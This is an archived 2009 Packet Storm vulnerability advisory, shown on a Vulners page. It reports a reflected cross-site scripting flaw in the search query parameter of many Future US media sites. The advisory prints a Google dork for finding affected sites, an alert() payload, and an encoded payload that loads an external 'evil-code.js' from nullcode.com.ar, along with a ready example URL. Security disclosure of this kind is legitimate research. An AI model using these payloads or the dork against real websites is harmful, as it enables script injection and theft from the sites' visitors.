Lucene search
K

Copyright 2008 Future US Cross Site Scripting

🗓️ 20 Jan 2009 00:00:00Reported by Ivan SanchezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Copyright 2008 Future US Cross Site Scripting. Exploitable cross-site scripting vulnerability in multiple domain

Code
` NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+===================================================================================================================+  
+ Copyright 2008 - Copyright 2008 Future US //Cross-site scripting (XSS) Remote Java Execution +  
+===================================================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: Copyright 2008 Future US   
  
  
  
http://www.futureus-inc.com/  
http://www.dailyradar.com/  
  
Date: 16/01/2009  
  
  
A lot domains are affected:  
---------------------------  
  
MovieBlips - Your daily movie news  
ShowHype - Biggest stories, best fans  
TVBlips - For TV aficionados only  
42Blips - For science fiction fans  
ComicsBlips - Excelsior! Comics news galore!  
TotalFilm - Welcome to the movies!  
BallHype - Best stories, biggest fans  
ActionSportsBlips - Surf, Skate, Ski, Snowboard  
BikeRadar - The world is for riding  
MMABlips - News to fight for  
RacingBlips - News built for speed  
CyclingNews - The world centre of cycling  
WallStreetBlips - Show me the money  
BeltwayBlips - All politics, all the time  
EarthBlips - Re-imagine the planet  
  
  
much more......  
  
Exploited from querystring or put into the texbox some evil xss-code or external java code , and then you can see the querystring :-  
or directly you put the evil code on the querystring .  
  
  
  
GOOGLE DORKS:  
------------  
  
intext:"Copyright 2008 Future US"  
  
  
  
Parameter Affected:  
-------------------  
  
query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E  
  
query="><script>alert(/CCC/)</script>&t=advanced&s=0&d=0&start=60  
  
query="></a><script>alert(1);</script>  
  
  
  
Example url:  
http://domain/search/?query=%22%3E%3Cscript%20src=http://nullcode.com.ar/thirdparty/scripts/evil-code.js%3E%3C/script%3E  
  
  
Remediation: Validate the Input.   
------------  
  
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
  
+===================================================================================================================+  
+ Copyright 2008 - Copyright 2008 Future US // Cross-site scripting (XSS) Remote Java Execution +  
+===================================================================================================================+  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jan 2009 00:00Current
0.1Low risk
Vulners AI Score0.1
31